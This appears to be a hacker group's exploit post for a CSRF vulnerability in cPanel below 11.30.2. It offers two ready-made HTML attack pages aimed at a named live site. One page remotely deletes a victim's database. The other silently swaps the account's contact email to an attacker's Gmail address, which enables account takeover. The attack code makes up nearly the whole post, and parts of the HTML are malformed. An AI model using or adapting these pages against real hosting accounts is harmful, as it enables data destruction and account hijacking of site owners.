[-] Vedio Demo : http://www.black-hg.org/Vedioz/cpanel.rar
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit=====================================================

[-]  Introduction :

cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which
leads to Change email address script of the attackers liking. If you have turned
off security tokens and referrer security check, no matter what version you
are using, you are vulnerable as well.

Note: You can use this vulnerability to do intelligent

[-]  Remote Delete Database

<html>
<head>
<body>
<title>Coded By #BHG</title>
<form method="post"
action=https://www.downloadpars.ir:2083/cpsess1461226313/frontend/x3/sql
/deldb.html
name="mainform" id="mainform">
        <h4>Delete Database</h4>
        <div class="highlight">
        <table cellpadding="3" cellspacing="0">
    <tr>
        <td><label for="dbname">Victim Database:</label></td>
        <td><input type="text" name="db" id="dbname" style="width: 150px" /></td>
        </tr>
    <td> </td>
                <td><center><input type="submit" id="submit_dbname"
value="Delete Database" class="input-button" /></center></td>
                <body onload="document.forms.g.submit();">
    <td></td>
        </tr>
        </table>
        </div>
    </form>
</div>
</body>
</html>

[-]  Remote Change Cpanel Mail

<html>
<head>
<body>
<title>Coded By #BHG</title>
<form id="mainform" name="mainform"
action=https://www.downloadpars.ir:2083/cpsess8033607818/frontend/x3/contact/
saveemail.html?email=>
<ul class="contact_form">

        <li class="contact_label">Chenge New Email Address</li>
        <li class="contact_input brd"><input id="email" name="email"
type="text" checked="checked" value="net.edit0r@gmail.com" size="40"
/></li>
        <li class="contact_label">The second address to receive
notifications</li>
        <li class="contact_input brd"><input id="second_email"
name="second_email" type="text" checked="checked" value="" size="40"
/></li>

        <li><strong>Contact Preferences</strong></li>

        <li class="contact_input"><input id="notify_disk_limit"
name="notify_disk_limit" type="checkbox" checked="checked" value="1"
size="40" />Send notifications to your contact email address when you
are reaching your disk quota.</li>
   
        <li class="contact_input"><input id="notify_bandwidth_limit"
name="notify_bandwidth_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when you are reaching your bandwidth usage limit.</li>
   
        <li class="contact_input"><input id="notify_email_quota_limit"
name="notify_email_quota_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when one of your email accounts approaches or is over quota.</li>

    <input style="margin-top:10px" type="submit" id="submit-button"
class="input-button" value="Save"></div></li>

</ul>
<br />

</form>
</div>
</body>
</html>

Tagged with:
Previous Entries Next Entries
preload preload preload